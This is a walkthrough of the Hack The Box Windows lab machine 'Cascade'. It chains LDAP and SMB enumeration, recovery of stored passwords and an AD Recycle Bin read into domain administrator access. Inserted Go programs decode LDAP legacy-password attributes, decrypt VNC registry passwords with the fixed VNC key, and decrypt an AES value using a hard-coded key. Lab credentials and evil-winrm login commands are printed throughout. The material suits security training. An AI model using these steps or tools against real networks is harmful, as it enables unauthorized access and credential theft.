Cascade Machine Walkthrough

Cascade Hackthebox Machine Detailed Walkthrough

“Your most unhappy customers are your greatest source of learning.” - Bill Gates

Machine Matrix

Machine Summary

Cascade is a Windows machine running Active Directory. The initial foothold is a base64-encoded password stored in a custom attribute of one user account, retrieved with an LDAP search. Enumerating the shares with those credentials turns up a VNC Install.reg file, from which the password of the user s.smith can be recovered. For privilege escalation, enumerating the shares again as s.smith gives access to Audit.db, which holds a password encrypted with a custom scheme. Decompiling the companion binaries in dnSpy reveals the encryption mechanism; after decryption we have the credentials of the service account ArkSvc. That account can read the deleted account TempAdmin back from the AD Recycle Bin, and the Administrator password is the same as TempAdmin's.

Nmap Scan

I started the enumeration with an nmap scan:

nmap -sC -sV 10.10.10.182

The box has 13 ports open:

Port    Service
53      domain
88      kerberos-sec
135     msrpc
139     netbios-ssn
389     ldap
445     microsoft-ds
636     tcpwrapped
3268    ldap
3269    tcpwrapped
49154   msrpc
49155   msrpc
49157   ncacn_http
49158   msrpc

DNS, Kerberos, LDAP, the Global Catalog on 3268/3269 and SMB together mark this as a domain controller. Ports 636 and 3269 show as tcpwrapped here but are LDAPS and the Global Catalog over TLS on a DC. WinRM on 5985, which is used for the shells later on, is not in this list, so a full port scan (nmap -p-) is worth running as well.

Enumeration on ports 139 and 445

I used smbclient to check whether anonymous login was allowed on the machine, but it was unsuccessful. I ran enum4linux to enumerate further:

enum4linux 10.10.10.182

Usernames

CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

I checked whether any of these users have Kerberos pre-authentication disabled, since an AS-REP roastable account would give an initial foothold, but that didn't work out.

Enumerating Using LDAP Queries

I then started enumerating Active Directory with LDAP queries:

ldapsearch -x -b "dc=cascade,dc=local" -H ldap://10.10.10.182

This returned a huge amount of output, so I saved it to a text file and went through it manually. That gave me a lead: a base64-encoded password in the cascadeLegacyPwd attribute of the user Ryan Thompson (r.thompson). Note that the bind above is anonymous (-x with no -D/-w), so this custom attribute, like the rest of the directory, was readable without any credentials.

Encoded password: clk0bjVldmE=
Decoded password: rY4n5eva
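Scripting that manual search pays off once the dump is large. The Go program below is an added example, not code from the original post: it parses LDIF in the shape ldapsearch produces (folded continuation lines, "#" comments, the "::" marker for values ldapsearch base64-encodes itself), then pulls out and decodes every cascadeLegacyPwd attribute it finds, labelled with the account's sAMAccountName. The embedded dump is constructed: only the r.thompson entry and its attribute value come from the box, and the objectGUID is a placeholder.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// Constructed ldapsearch excerpt: the r.thompson entry and its cascadeLegacyPwd
// value are from the box, the objectGUID is a placeholder. It exercises a folded
// dn line, a "::" base64 attribute, comments and the trailer ldapsearch appends.
const sampleLDIF = `# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,
 DC=local
objectClass: user
sAMAccountName: r.thompson
objectGUID:: AAAAAAAAAAAAAAAAAAAAAA==
cascadeLegacyPwd: clk0bjVldmE=

# search result
search: 2
result: 0 Success
`

// Entry is one LDIF record; attribute names are lower-cased (LDAP is case-insensitive).
type Entry struct {
	DN    string
	Attrs map[string][]string
}

// parseLDIF splits a dump into entries: it joins folded lines, skips "#" comments
// and decodes "attr:: value" lines, which ldapsearch uses for non-printable values.
func parseLDIF(text string) ([]Entry, error) {
	// Unfold: a line that starts with a single space continues the previous line.
	text = strings.ReplaceAll(text, "\n ", "")
	var entries []Entry
	for _, block := range strings.Split(text, "\n\n") {
		e := Entry{Attrs: map[string][]string{}}
		for _, l := range strings.Split(block, "\n") {
			if l == "" || strings.HasPrefix(l, "#") {
				continue
			}
			name, val, ok := strings.Cut(l, ":")
			if !ok {
				return nil, fmt.Errorf("malformed LDIF line: %q", l)
			}
			if strings.HasPrefix(val, ":") { // attr:: base64(value)
				raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(val[1:]))
				if err != nil {
					return nil, fmt.Errorf("bad base64 in %s: %w", name, err)
				}
				val = string(raw)
			} else {
				val = strings.TrimSpace(val)
			}
			if name = strings.ToLower(name); name == "dn" {
				e.DN = val
			} else {
				e.Attrs[name] = append(e.Attrs[name], val)
			}
		}
		if e.DN != "" || len(e.Attrs) > 0 {
			entries = append(entries, e)
		}
	}
	return entries, nil
}

// Credential is a decoded legacy password and the account it belongs to.
type Credential struct{ User, Password string }

// findLegacyPasswords base64-decodes every cascadeLegacyPwd attribute (the manual
// step in the post) and labels it with the entry's sAMAccountName, or its dn.
func findLegacyPasswords(entries []Entry) []Credential {
	var out []Credential
	for _, e := range entries {
		for _, enc := range e.Attrs["cascadelegacypwd"] {
			raw, err := base64.StdEncoding.DecodeString(enc)
			if err != nil {
				continue // not base64: leave it for manual review
			}
			user := e.DN
			if s := e.Attrs["samaccountname"]; len(s) > 0 {
				user = s[0]
			}
			out = append(out, Credential{user, string(raw)})
		}
	}
	return out
}

func main() {
	entries, err := parseLDIF(sampleLDIF)
	if err != nil {
		panic(err)
	}
	for _, c := range findLegacyPasswords(entries) {
		fmt.Printf("%s : %s\n", c.User, c.Password)
	}
}
```

Point it at the saved ldapsearch output instead of the embedded sample and it lists every account carrying the attribute; the same parser can be reused for any other custom attribute worth hunting (descriptions and info fields are the usual suspects).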

I tried to log in over WinRM with evil-winrm using these credentials, but it didn't work.

Enumerating Shares with r.thompson credentials

Now I enumerated the shares with r.thompson's credentials. Thompson had access to certain shared folders.

smbclient -L //10.10.10.182 -U r.thompson

I went through each folder and found a file, VNC Install.reg, in the \IT\Temp\s.smith\ directory.

Acquiring User Shell - s.smith

I downloaded the file and looked into it. It is a registry export, and the VNC password is stored in it as an encoded binary value.

I first took it for a plain hex encoding, but it wasn't. VNC stores its password DES-encrypted with a fixed key that is the same in every VNC implementation, so the value is only obfuscated: anyone who can read the registry key can recover the cleartext. After some research I found a tool for decrypting the password from a VNC registry file, vncpwd (https://aluigi.altervista.org/pwdrec/vncpwd.zip), and used it:

username: s.smith
password: sT333ve2
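What vncpwd does can be reproduced in a few lines, because the "encryption" is a single DES block under a fixed, published key (0x17 0x52 0x6b 0x06 0x23 0x4e 0x58 0x07). VNC's d3des routines consume key bytes bit-reversed, so a standard DES library has to be given the bit-reversed form, e84ad660c4721ae0, which is also the -K value the openssl one-liners for this trick use. The Go program below is an added example, not code from the post or from vncpwd. The registry line it decrypts is the Password value from the VNC Install.reg on this box; the post does not quote the bytes, so that value is an assumption here.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// The Password value from VNC Install.reg under IT\Temp\s.smith. The post does
// not reproduce the bytes; this is the value assumed here.
const regLine = `"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f`

// vncFixedKey is the well-known constant every VNC flavour (RealVNC, TightVNC,
// UltraVNC) uses to "encrypt" stored passwords, which is why they are recoverable.
var vncFixedKey = [8]byte{0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07}

// reverseBits mirrors the bit order of one byte (0x17 -> 0xe8).
func reverseBits(b byte) byte {
	var r byte
	for i := 0; i < 8; i++ {
		r = r<<1 | b&1
		b >>= 1
	}
	return r
}

// desKey returns the fixed key in the bit order a standard DES implementation
// expects. VNC's d3des reads key bytes LSB-first, so for Go's crypto/des (as for
// openssl -K e84ad660c4721ae0) each byte is bit-reversed.
func desKey() []byte {
	k := make([]byte, 8)
	for i, b := range vncFixedKey {
		k[i] = reverseBits(b)
	}
	return k
}

// regHexToBytes parses a single-line REG_BINARY entry from a .reg export,
// e.g. "Password"=hex:6b,cf,... into raw bytes.
func regHexToBytes(line string) ([]byte, error) {
	_, v, ok := strings.Cut(line, "=hex:")
	if !ok {
		return nil, fmt.Errorf("no hex: value in %q", line)
	}
	return hex.DecodeString(strings.ReplaceAll(strings.TrimSpace(v), ",", ""))
}

// decryptVNCPassword runs one DES-ECB decryption of the 8-byte stored value with
// the fixed key and strips the NUL padding VNC adds to passwords shorter than 8.
func decryptVNCPassword(enc []byte) (string, error) {
	if len(enc) != des.BlockSize {
		return "", fmt.Errorf("stored VNC password must be %d bytes, got %d", des.BlockSize, len(enc))
	}
	block, err := des.NewCipher(desKey())
	if err != nil {
		return "", err
	}
	out := make([]byte, des.BlockSize)
	block.Decrypt(out, enc)
	return string(bytes.TrimRight(out, "\x00")), nil
}

func main() {
	enc, err := regHexToBytes(regLine)
	if err != nil {
		panic(err)
	}
	pw, err := decryptVNCPassword(enc)
	if err != nil {
		panic(err)
	}
	fmt.Printf("s.smith VNC password: %s\n", pw)
}
```

The same routine works for the Password value of any VNC server that keeps it in the registry or in ~/.vnc/passwd, since VNC truncates passwords to eight characters and all implementations share the key.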

I used evil-winrm to get a shell:

evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

Privilege Escalation

Again I enumerated the shares, this time with s.smith's credentials, which give access to the Audit$ share:

smbclient //10.10.10.182/Audit$ -U s.smith

It contains a file called Audit.db, a SQLite database, which looked like our way to privilege escalation. I simply checked its contents with strings (sqlite3 would show the same data together with the table structure):

strings Audit.db

I found a base64-looking value that had to be the password. I tried cracking it as a hash with john and hashcat, but that got nowhere, so I concluded that it must be a custom-encrypted password rather than a hash.

Decompiling CascAudit.exe and CascCrypto.dll

While enumerating the shares we also found an executable and a DLL, CascAudit.exe and CascCrypto.dll. They implement the encryption, so decompiling them should reveal the scheme and let us decrypt the value.

I loaded CascAudit.exe and CascCrypto.dll into dnSpy. The scheme is AES-128 in CBC mode, with a hard-coded key (c4scadek3y654321) and a hard-coded IV (1tdyjCbY1Ix49842). Hard-coding both in a DLL that sits on a share means anyone who can read the DLL can decrypt every password the audit tool ever stored.

I used an online AES decrypter, supplying the key, IV and the encrypted value, and recovered the password. Doing this offline is the better habit, since an online tool receives the recovered credential.

username: arksvc
password: w3lc0meFr31nd
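The decryption is a few lines of code and needs no website. The program below is an added example, not the post's code and not the DLL's: it reproduces the scheme recovered in dnSpy (AES-128-CBC, key and IV taken as the UTF-8 bytes of the two strings, PKCS#7 padding, which is the .NET default) and includes the encrypt direction so the reimplementation can be checked by round trip before a decrypted value is trusted. The base64 value it decrypts is the one stored for arksvc in Audit.db; the post refers to it without quoting it, so it is an assumption here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)

// Key and IV recovered from CascCrypto.dll with dnSpy; the DLL uses the UTF-8
// bytes of these strings directly, so AES-128 with a 16-byte IV.
const (
	cascKey = "c4scadek3y654321"
	cascIV  = "1tdyjCbY1Ix49842"
)

// auditValue is the encrypted password stored for arksvc in Audit.db. The post
// refers to it but does not quote it; this value is assumed here.
const auditValue = "BQO5l5Kj9MdErXx6Q6AGOw=="

// cascDecrypt mirrors the DLL's decrypt routine: base64-decode, AES-128-CBC with
// the fixed key and IV, then strip PKCS#7 padding (the .NET default).
func cascDecrypt(b64 string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext is %d bytes, not a multiple of %d", len(ct), aes.BlockSize)
	}
	block, err := aes.NewCipher([]byte(cascKey))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(cascIV)).CryptBlocks(pt, ct)
	pt, err = unpadPKCS7(pt, aes.BlockSize)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

// cascEncrypt is the inverse direction, so the reimplementation can be checked by
// round trip: PKCS#7-pad, AES-128-CBC with the same key and IV, base64-encode.
func cascEncrypt(plain string) (string, error) {
	block, err := aes.NewCipher([]byte(cascKey))
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plain)%aes.BlockSize
	pt := append([]byte(plain), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, []byte(cascIV)).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(ct), nil
}

// unpadPKCS7 removes and validates PKCS#7 padding; a wrong key or corrupted
// data usually surfaces here as a padding error rather than as garbage output.
func unpadPKCS7(b []byte, blockSize int) ([]byte, error) {
	if len(b) == 0 {
		return nil, fmt.Errorf("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > blockSize || n > len(b) {
		return nil, fmt.Errorf("invalid padding length %d", n)
	}
	if !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("invalid padding bytes")
	}
	return b[:len(b)-n], nil
}

func main() {
	pw, err := cascDecrypt(auditValue)
	if err != nil {
		panic(err)
	}
	fmt.Printf("arksvc : %s\n", pw)
}
```

Because key and IV are constants, every row the tool ever wrote decrypts with the same call; feeding it each value from the Ldap table of Audit.db is a one-line loop.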

Enumerating the shares with s.smith's credentials also turned up a log file (ArkAdRecycleBin.log) and an HTML file (Meeting_Notes_June_2018.html).

I downloaded both and went through them.

Acquiring Administrator Access

According to the log file, the TempAdmin user was deleted by the ArkSvc user, and Meeting_Notes_June_2018.html states that TempAdmin and Administrator share the same password.

So if we can read TempAdmin's password back through the account that deleted it (ArkSvc), we get an administrator shell. I searched for how to recover deleted accounts and found a blog post describing it with PowerShell. This only works because the AD Recycle Bin optional feature is enabled on the domain (deleted objects keep their attributes until the tombstone lifetime expires) and ArkSvc, the account running the recycle-bin job, has rights to read the Deleted Objects container:

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *

I ran this command in a shell as ArkSvc (evil-winrm with the credentials above).

As expected, the deleted TempAdmin object still carries a base64-encoded password in its cascadeLegacyPwd attribute. I decoded it:

username: TempAdmin, Administrator
password: baCT3r1aN00dles

I got an Administrator shell with evil-winrm using these credentials.

Happy Hacking !


© 2020. All rights reserved to r3dw0lf_sec.
